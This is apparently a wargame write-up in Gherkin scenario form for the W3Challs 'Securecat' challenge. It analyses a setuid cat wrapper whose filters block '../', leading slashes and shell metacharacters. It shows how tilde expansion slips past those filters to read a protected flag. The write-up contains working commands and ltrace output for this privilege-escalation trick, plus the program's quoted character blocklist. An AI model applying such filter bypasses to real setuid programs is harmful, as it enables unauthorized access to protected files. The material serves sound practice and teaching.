# language: en

Feature: Solve challenge 59
  From site W3Challs
  From Wargame Category
  With my username Skhorn

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am using SSH
  Given a description of the challenge + access params
  """
  URL: https://w3challs.com/challenges/challenge59
  Message: Securecat
  Details: The flag is in /home/securecat_pwned/flag.
  Description:
             -  Server :  wargame.w3challs.com
             -  Port :  10101
             -  User :  securecat
             -  Password :  securecat
  """

Scenario: Setuid
The folder of the user securecat contains a Setuid,
which in definition is a script that gives a user
privileges to read/write/execute on any file not allowed
by it's regular user privileges.
In this case, to read a file which only securecat_pwned
can read it.
  Given three files:
  """
  securecat.c
  ./securecat
  Makefile
  """
  Then I execute *ls -l* on */home/securecat_pwned/flag*
  And I see:
  """
  # ls output on flag file
  securecat@wargame ~ $ ls -l /home/securecat_pwned/flag
  -r-------- 1 securecat_pwned root 37 May 16  2017 /home/securecat_pwned/flag
  """
  And I execute *cat* on the flag to corroborate
  And efectively I cannot see it's content
  """
  securecat@wargame ~ $ cat /home/securecat_pwned/flag
  cat: /home/securecat_pwned/flag: Permission denied
  """
  Then I execute *ls -l* on the folder to check file's privileges:
  """
  # ls -lah on current directory
  securecat@wargame ~ $ ls -lah
  ...
  -rw-r--r--  1 root            securecat  461 May 13  2017 Makefile
  -r-sr-x---  1 securecat_pwned securecat 7.6K May 12  2017 securecat
  -r--r-----  1 root            securecat  968 May 11  2017 securecat.c

  # Privileges in octal
  securecat@wargame ~ $ stat -c "%a %n" *
  644 Makefile
  4550 securecat
  440 securecat.c
  """
  And I notice that *./securecat* has the 's' extra bit activated
  """
  # Setuid bit octet:
  -r-sr-x--- which in octal is 4550
  """
  And I know this means it is a Setuid
  Then I execute *./securecat* on */home/securecat_pwned/flag*
  And I see it's output:
  """
  # ./securecat output on flag file
  /bin/cat: home/securecat_pwned/flag: No such file or directory
  """
  Then I need to check the source code
  And see how it works

Scenario: Script Source code
Using the source code and some testing to
understand the flow of execution of the
script.
  Given the source code of *securecat.c*
  Then I see why it's named *securecat*
  And I see there is a function to replace absolute path
  """
  Source: server-/home/securecat/securecat.c
  # No absolute path
  18  while (*str[0] == '/')
  19  {
  20    (*str)++;
  21  }
  """
  And I understand why the following doesn't work
  """
  # ./securecat output on flag file
  securecat@wargame ~ $ ./securecat /securecat_pwned/flag
  /bin/cat: home/securecat_pwned/flag: No such file or directory
  """

  And I see there is a function to avoid directory traversal
  """
  Source: server-/home/securecat/securecat.c
  # No Directory traversal
  24  while ((replace = strstr(*str, "../")))
  25  {
  26    replace[1] = '/';
  27  }
  """
  And I test it to see if it is effective
  """
  securecat@wargame ~ $ ./securecat ../securecat_pwned/flag
  /bin/cat: .//securecat_pwned/flag: No such file or directory
  """

  And I see shell special chars are replaced
  """
  Source: server-/home/securecat/securecat.c
  # No shell special chars
  15  char dangerous[] = "#&;`'\"*?<>^()[]{}$,\t\n ";
  ...
  ...
  30  for (i = 0; i < strlen(dangerous); i++)
  31  {
  32    while ((replace = strchr(*str, dangerous[i])))
  33    {
  34      replace[0] = '_';
  35    }
  36  }
  """

  And I see it is validating the max size so *bufferover flow* fails
  """
  Source: server-/home/securecat/securecat.c
  # No shell special chars
  51  if (strlen(argv[1]) > MAX_SIZE)
  52  {
  53    printf("Filename too long !\n");
  54    exit(1);
  55  }
  """
  And I test it
  """
  securecat@wargame ~ $ ./securecat $(echo `perl -e
    'print"%x-" x120;'`)/home/securecat_owned/flag
  Filename too long !
  """

Scenario: Exploitation
By looking at the workflow to exploit we
need to rely on testing unexpected input
and see it's behaviour
  Given I cannot give this as the script params:
  """
  ../path/to/flag
  /path/to/flag
  Nor try to inject more character to overflow the buffer
  """
  Then I try to see how it behaves if use *~* symbol
  But I already know is not escaped as a dangerous character
  And I know *~* corresponds to the *$HOME* internal variable
  """
  # Testing with ~ symbol
  securecat@wargame ~ $ ./securecat ~/home/securecat_pwned/flag
  /bin/cat: home/securecat/home/securecat_pwned/flag: No such file or directory
  """
  And I see from the output, that it already worked
  And It wasn't escaped
  Then I check again if I can get the relative path using it
  """
  # Testing with ~ symbol
  securecat@wargame ~ $ cat ~securecat
  cat: /home/securecat: Is a directory
  securecat@wargame ~ $ cat ~securecat_pwned
  cat: /home/securecat_pwned: Is a directory
  """
  Then I look at *ltrace* command on the script
  """
  # securecat@wargame ~ $ ltrace ./securecat /~securecat_pwned/flag
  strlen("#&;`'"*?<>^()[]{}$,\t\n ")
  sprintf("/bin/cat ~securecat_pwned/flag", "%s%s", "/bin/cat ",
    "~securecat_pwned/flag")
  system("/bin/cat ~securecat_pwned/flag"/bin/cat: /home/securecat_pwned/flag:
    Permission denied
   <no return ...>
   --- SIGCHLD (Child exited) ---
   <... system resumed> )
   +++ exited (status 0) +++
  """
  And I see the symbol is effectively passed
  But have mind, debugging removes privileges
  And that's why it displays: Permission denied

  When I perform:
  """
  securecat@wargame ~ $ ./securecat /~securecat_pwned/flag
  -- content of the flag hidden --
  """
  Then I get the flag of the challenge
